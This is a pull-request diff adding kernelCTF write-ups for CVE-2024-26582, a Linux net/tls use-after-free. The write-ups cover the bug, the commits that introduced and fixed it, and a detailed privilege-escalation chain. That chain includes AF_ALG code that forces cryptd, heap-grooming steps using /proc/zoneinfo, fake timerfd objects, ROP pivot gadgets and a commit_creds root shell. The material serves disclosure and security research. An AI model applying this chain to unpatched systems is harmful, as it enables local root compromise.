Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
210 changes: 210 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26582_lts/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,210 @@
## Setup

To trigger the TLS encryption we must first configure the socket.
This is done using the setsockopt() with SOL_TLS option:

```
static struct tls12_crypto_info_aes_ccm_128 crypto_info;
crypto_info.info.version = TLS_1_2_VERSION;
crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128;

if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0)
err(1, "TLS_TX");

```

This syscall triggers allocation of TLS context objects which will be important later on during the exploitation phase.

In KernelCTF config PCRYPT (parallel crypto engine) is disabled, so our only option to trigger async crypto is CRYPTD (software async crypto daemon).

Each crypto operation needed for TLS is usually implemented by multiple drivers.
For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (which is a daemon that runs these basic synchronous crypto operations in parallel using an internal queue).

Available drivers can be examined by looking at /proc/crypto, however those are only the drivers of the currently loaded modules. Crypto API supports loading additional modules on demand.

As seen in the code snippet above we don't have direct control over which crypto drivers are going to be used in our TLS encryption.
Drivers are selected automatically by Crypto API based on the priority field which is calculated internally to try to choose the "best" driver.

By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations.

However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver.

The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations.

Following code causes AES CCM encryption selected for TLS to be handled by cryptd:

```
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "skcipher",
.salg_name = "cryptd(ctr(aes-generic))"
};
int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0);

if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0)
err(1, "af_alg bind");

struct sockaddr_alg sa2 = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))"
};

if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa)) < 0)
err(1, "af_alg bind");
```

## Triggering the first free of the physical page

To free physical pages backing the skb we only have to perform a partial read on a socket that has some TLS data available.
An order-0 page will be released to the PCP.

## Reallocating released pages

Any object that allocates from a cache using a single page slab can be used here.

We decided to use user_key_payload object:

```
struct user_key_payload {
struct callback_head rcu __attribute__((__aligned__(8))); /* 0 0x10 */
short unsigned int datalen; /* 0x10 0x2 */
char data[] __attribute__((__aligned__(8))); /* 0x18 0 */
};
```

Before we trigger the partial read, we allocate a fresh slab of kmalloc-256 using the [zoneinfo parsing technique](novel-techniques.md#predicting-when-a-new-heap-slab-is-going-to-be-allocated).
Then we allocate 15 more xattrs (whole slab fits 16), making sure that the next kmalloc-256 allocation will use our skb page from the PCP.

Finally, we allocate the key.

## Triggering the double free

Reading the remaining data from the socket will release the physical page that is now used by user_key_payload objects.

## Overwriting user_key_payload objects and leaking data

Next step is to overwrite user_key_payload with simple_xattr:
```
struct simple_xattr {
struct list_head list; /* 0 0x10 */
char * name; /* 0x10 0x8 */
size_t size; /* 0x18 0x8 */
char value[]; /* 0x20 0 */
};
```

This has an effect of changing the datalen field of the key to a large value, giving us a leak.

We use this to identify a target xattr located below the key we used for leaks.
We also look through other xattrs' next/prev pointers to determine target xattr's location in the kernel memory - we'll need it later to be able to set pointers to our payload.

### Freeing xattr and allocating timerfd_ctx

Our chosen xattr is then replaced with timerfd_ctx which also belongs to the kmalloc-256:

```
struct timerfd_ctx {
union {
struct hrtimer tmr __attribute__((__aligned__(8))); /* 0 0x40 */
struct alarm alarm __attribute__((__aligned__(8))); /* 0 0x78 */
} t __attribute__((__aligned__(8))); /* 0 0x78 */
ktime_t tintv; /* 0x78 0x8 */
ktime_t moffs; /* 0x80 0x8 */
wait_queue_head_t wqh; /* 0x88 0x18 */
u64 ticks; /* 0xa0 0x8 */
int clockid; /* 0xa8 0x4 */
short unsigned int expired; /* 0xac 0x2 */
short unsigned int settime_flags; /* 0xae 0x2 */
struct callback_head rcu __attribute__((__aligned__(8))); /* 0xb0 0x10 */
/* --- cacheline 3 boundary (192 bytes) --- */
struct list_head clist; /* 0xc0 0x10 */
spinlock_t cancel_lock; /* 0xd0 0x4 */
bool might_cancel; /* 0xd4 0x1 */

/* size: 216, cachelines: 4, members: 12 */
};

struct hrtimer {
struct timerqueue_node node __attribute__((__aligned__(8))); /* 0 0x20 */
ktime_t _softexpires; /* 0x20 0x8 */
enum hrtimer_restart (*function)(struct hrtimer *); /* 0x28 0x8 */
struct hrtimer_clock_base * base; /* 0x30 0x8 */
u8 state; /* 0x38 0x1 */
u8 is_rel; /* 0x39 0x1 */
u8 is_soft; /* 0x3a 0x1 */
u8 is_hard; /* 0x3b 0x1 */

/* size: 64, cachelines: 1, members: 8 */
} __attribute__((__aligned__(8)));

struct hrtimer_clock_base {
struct hrtimer_cpu_base * cpu_base; /* 0 0x8 */
unsigned int index; /* 0x8 0x4 */
clockid_t clockid; /* 0xc 0x4 */
seqcount_raw_spinlock_t seq; /* 0x10 0x4 */
struct hrtimer * running; /* 0x18 0x8 */
struct timerqueue_head active; /* 0x20 0x10 */
ktime_t (*get_time)(void); /* 0x30 0x8 */
ktime_t offset; /* 0x38 0x8 */

/* size: 64, cachelines: 1, members: 8 */
} __attribute__((__aligned__(64)));

```

### Leaking kernel base and getting RIP control

Next step is to leak the timerfd_ctx.t.tmr.function pointer to get the kernel text base.
For this pointer to be set, the timer must be first activated with timerfd_setime().

Next step is to trigger removal of key objects and replacing them with xattrs to overwrite timerfd_ctx objects with our fake timers.

Fake timerfd_ctx is prepared in prepare_fake_timer().

Instead of using the obvious t.tmr.function for RIP control, we used base.get_time() as it gives us code execution in the syscall context instead of an interrupt context.

This means we have to find a place with a known location for our hrtimer_clock_base object, but fortunately we know the address of the timerfd_ctx because it's the same address we leaked from the xattr before.
We only need one pointer from the hrtimer_clock_base so we use an unused offset of our fake timer for this purpose.

Finally, we call timerfd_gettime() on our corrupted timerfd objects to get RIP control.

### Pivot to ROP

When get_time() is called, R12 contains a pointer to our timerfd_ctx.

Following gadgets are used to pivot to ROP:

```
mov rsi, qword ptr [r12 + 0x48]
mov rdi, qword ptr [r12 + 0x50]
mov rdx, r15
mov rax, qword ptr [r12 + 0x58]
call __x86_indirect_thunk_rax

```

then

```
push rdi
jmp qword ptr [rsi + 0xf]
```

and

```
pop rsp
ret
```

which means our ROP chain at location pointed to by timerfd_ctx + 0x50. We also set this pointer to a part of the fake timerfd_ctx.

## Second pivot

At this point we have full ROP, but not much space left, so we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second stage ROP from userspace to that area.
Then we use a `pop rsp ; ret` gadget to pivot there.

## Privilege escalation

The execution is happening in the context of a syscall this time, so it's easy to escalate privileges with standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and return to the root shell.
50 changes: 50 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26582_lts/docs/novel-techniques.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
## Determining heap and page allocator state by parsing /proc/zoneinfo

Linux kernel exposes a lot of information in a world-readable /proc/zoneinfo including:

- per-node free/low/high page counters for the buddy allocator
- per-cpu cache count/high/batch counters

This can be useful in multiple ways during exploitation.

### Predicting when a new heap slab is going to be allocated

When performing a cross-cache attack or any other technique involving reuse of physical pages by SLUB allocator we would like to be able to allocate our victim object from a newly allocated slab.

This is not trivial because we don't know the existing state of a given kmalloc cache - it probably already has some partial slabs and a new kmalloc will use them before allocating a new slab page.

The usual solution to this problem is to just allocate a lot of objects and hope some will eventually be allocated from the new page.
The downside is that we won't know which allocated object is the one we are interested in (the one from a new page).

There are also often limits on the number of the victim object we can create.
In an extreme case, the victim object can be a single-instance item and we only have one chance to get it allocated from the page we want.

Lastly, when exploiting a use-after-free caused by a race condition we need to perform the reallocation in the shortest time possible and performing hundred allocation syscalls in the tight race condition window just won't work.

Even when there are no such limitations, using this technique tends to increase exploit reliability.

Parsing /proc/zoneinfo solves these problems by giving us a count of the currently available pages on our CPU, for example:
```
cpu: 0
count: 293
high: 378
batch: 63
```

Before performing our attack we need to prepare by allocating objects from the chosen cache (e.g. kmalloc-256) and reading /proc/zoneinfo after each allocation.
When count is decreased by the number of pages per slab (e.g. kmalloc-256 uses 1 page per slab and kmalloc-512 2 pages, but this is version and config dependent).

When we notice the decrease in page it means our last allocation triggered a new slab.

Now we have to allocate (objects_per_slab-1) objects and we can be sure that the current slab is full and next allocation (the important one) will use a newly allocated physical page.


### Predicting how much we have to allocate free to trigger PCP flush

Sometimes we want to reuse a physical page for allocation that needs a page of a different order (e.g. we have a use-after-free object from kmalloc-512 that uses order 1 page and we want to reallocate it from kmalloc-256 cache that uses order 0 pages).

To be able to do this we have to flush our page from the PCP to return it to the buddy allocation. To do this we need to free enough physical pages to exceed the 'high' mark of the PCP.
Parsing /proc/zoneinfo allows us to know exactly how many pages have to be freed instead of doing it blindly.



33 changes: 33 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26582_lts/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_TLS and one of [CONFIG_CRYPTO_PCRYPT, CONFIG_CRYPTO_CRYPTD]
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fd31f3996af2627106e22a9f8072764fede51161

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=32b55c5ff9103b8508c1e04bfa5a08c64e7a925f

## Affected kernel versions

Introduced in 6.0. Fixed in 6.1.78 and other stable trees.

## Affected component, subsystem

net/tls

## Description

When TLS decryption is used in async mode tls_sw_recvmsg() tries to use a zero-copy mode if possible, but this only works if the caller has enough space to receive the entire cleartext message.
For partial reads a clear text skb is allocated in tls_decrypt_sg() instead.

Pointers to physical pages backing this skb are then copied into the sgvec passed to tls_do_decryption(), but reference count is not increased on these pages.

The skb is then added to the rx_list queue.

After decryption is finished, tls_decrypt_done() calls put_page() on these pages, triggering their release, but they are still referenced in the skb in the rx_list queue.

When another tls_sw_recvmsg() call is made on the same socket use-after-free happens, with data being read from the released physical pages backing the skb and when all data has been read, double-free happens, as consume_skb() tries to release the already released physical pages.
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
INCLUDES =
LIBS = -pthread -ldl -lkeyutils
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_6.1.77.h
gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
sudo apt-get install libkeyutils-dev
Binary file not shown.
Loading